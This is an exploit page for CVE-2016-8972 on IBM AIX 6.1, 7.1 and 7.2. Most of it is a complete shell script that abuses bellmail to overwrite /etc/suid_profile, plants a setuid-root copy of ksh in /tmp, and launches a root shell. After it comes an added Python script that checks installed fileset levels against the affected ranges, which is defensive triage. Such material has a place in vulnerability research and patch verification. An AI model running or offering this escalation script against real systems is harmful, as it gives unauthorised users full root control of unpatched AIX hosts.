IBM AIX 6.1/7.1/7.2 - 'Bellmail' Privilege Escalation
Source: https://www.rhinosecuritylabs.com  Author: Monsegur  Published: 2016-12-23
#!/usr/bin/sh
#
# CVE-2016-8972/bellmailroot.sh: IBM AIX Bellmail local root
#
# Affected versions:
# AIX 6.1, 7.1, 7.2
# VIOS 2.2.x
#
#         Fileset                Lower Level  Upper Level KEY
#        ---------------------------------------------------------
#        bos.net.tcp.client       6.1.9.0      6.1.9.200   key_w_fs
#        bos.net.tcp.client       7.1.3.0      7.1.3.47    key_w_fs
#        bos.net.tcp.client       7.1.4.0      7.1.4.30    key_w_fs
#        bos.net.tcp.client_core  7.2.0.0      7.2.0.1     key_w_fs
#        bos.net.tcp.client_core  7.2.1.0      7.2.1.0     key_w_fs
#
# Ref: http://aix.software.ibm.com/aix/efixes/security/bellmail_advisory.asc
# Ref: https://rhinosecuritylabs.com/2016/12/21/unix-nostalgia-aix-bug-hunting-part-2-bellmail-privilege-escalation-cve-2016-8972/
# @hxmonsegur //RSL - https://www.rhinosecuritylabs.com
 
ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}')
VULNBIN=/usr/bin/bellmail
SUIDPROFILE=/etc/suid_profile
 
function ESCALATE
{
    echo "[*] Preparing escalation"
 
    $VULNBIN >/dev/null 2>&1 <<EOD
s /etc/suid_profile
EOD
 
    if [ ! -w $SUIDPROFILE ]; then
        echo "[-] $SUIDPROFILE is not writable. Exploit failed."
        exit 1
    fi
 
    echo "[*] Clearing out $SUIDPROFILE"
    echo > /etc/suid_profile
 
    echo "[*] Injecting payload"
    cat << EOF >$SUIDPROFILE
cp /bin/ksh $ROOTSHELL
/usr/bin/syscall setreuid 0 0
chown root:system $ROOTSHELL
chmod 6755 $ROOTSHELL
rm -f $SUIDPROFILE
EOF
 
    echo "[*] Executing SUID to leverage privileges"
    /usr/bin/ibstat -a >/dev/null 2>&1
 
    if [ ! -x $ROOTSHELL ]; then
        echo "[-] Root shell does not exist or is not executable. Exploit failed."
        exit 1
    fi
 
    echo "[*] Escalating to root.."
    $ROOTSHELL
    echo "[*] Make sure to remove $ROOTSHELL"
}
 
echo "[*] IBM AIX 6.1, 7.1, 7.2 Bellmail Local root @hxmonsegur//RSL"
 
$VULNBIN -e
if [ $? -eq 0 ]
    then
        ESCALATE
        echo "[*] Make sure to remove $ROOTSHELL"
        exit 0
fi
 
echo "[*] Sending mail to non-existent user, force a bounce within ~minute"
/usr/bin/mail nonexistentuser <<EOD
.
.
.
EOD
 
echo "[*] Waiting for mail to come in."
 
while true
do
    $VULNBIN -e
    if [ $? -eq 0 ]
        then
            echo "[*] Mail found"
            ESCALATE
            break
        else
            echo "[-] Mail not received yet. Sleeping."
            sleep 10
        fi
done
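The header of the script above lists the fileset levels the IBM advisory marks as affected. The following is an added defender-side example, not part of the original exploit or of the Rhino Security Labs post: it parses that table into numeric VRMF tuples and triages `lslpp -L` style output so an administrator can spot hosts still inside an affected range. The `lslpp` lines are constructed sample input (the column layout assumed is fileset name followed by level), and the lower/upper bounds are treated as inclusive, which is an assumption about the advisory table rather than something the page states.

```python
# Added example (not from the original exploit): triage AIX fileset levels
# against the affected ranges quoted in the advisory header above.
from typing import List, Tuple

# Affected ranges copied from the advisory table on the page:
# (fileset, lower level, upper level), bounds assumed inclusive.
AFFECTED = [
    ("bos.net.tcp.client", "6.1.9.0", "6.1.9.200"),
    ("bos.net.tcp.client", "7.1.3.0", "7.1.3.47"),
    ("bos.net.tcp.client", "7.1.4.0", "7.1.4.30"),
    ("bos.net.tcp.client_core", "7.2.0.0", "7.2.0.1"),
    ("bos.net.tcp.client_core", "7.2.1.0", "7.2.1.0"),
]


def parse_level(level: str) -> Tuple[int, ...]:
    """Turn an AIX VRMF level such as '7.1.3.47' into a numerically comparable tuple.

    Numeric comparison matters: as strings, '6.1.9.30' sorts after '6.1.9.200',
    but 30 < 200 is the comparison the advisory table intends.
    """
    return tuple(int(part) for part in level.split("."))


def is_affected(fileset: str, level: str) -> bool:
    """Return True if the installed level lies inside any affected range for the fileset."""
    installed = parse_level(level)
    for name, lower, upper in AFFECTED:
        if name == fileset and parse_level(lower) <= installed <= parse_level(upper):
            return True
    return False


def parse_lslpp(output: str) -> List[Tuple[str, str]]:
    """Extract (fileset, level) pairs from lslpp -L style output.

    Assumption: each data line starts with the fileset name followed by its
    VRMF level; header and separator lines do not start with 'bos.' and are skipped.
    """
    pairs = []
    for line in output.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0].startswith("bos."):
            pairs.append((parts[0], parts[1]))
    return pairs


def triage(output: str) -> List[str]:
    """Return 'fileset level' strings for every installed fileset in an affected range."""
    return [f"{fs} {lvl}" for fs, lvl in parse_lslpp(output) if is_affected(fs, lvl)]


# Constructed sample output: one level on the upper bound of an affected range,
# one level just past an upper bound, and one unrelated fileset.
SAMPLE_LSLPP = """\
  Fileset                      Level  State  Type  Description
  ----------------------------------------------------------------------------
  bos.net.tcp.client         7.1.3.47    C     F    TCP/IP Client Support
  bos.net.tcp.client_core    7.2.1.1     C     F    TCP/IP Client Core
  bos.rte.security           7.1.3.45    C     F    Base Security Function
"""

if __name__ == "__main__":
    hits = triage(SAMPLE_LSLPP)
    for hit in hits:
        print("AFFECTED:", hit)
    if not hits:
        print("No fileset in an affected range.")
```

On a real host the input would come from `lslpp -L bos.net.tcp.client bos.net.tcp.client_core`; the exact column widths vary between AIX releases, which is why the parser keys on the fileset prefix rather than on fixed offsets. A level past the listed upper bound is reported as unaffected, so the output should be read together with the IBM efix information in the referenced advisory.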
 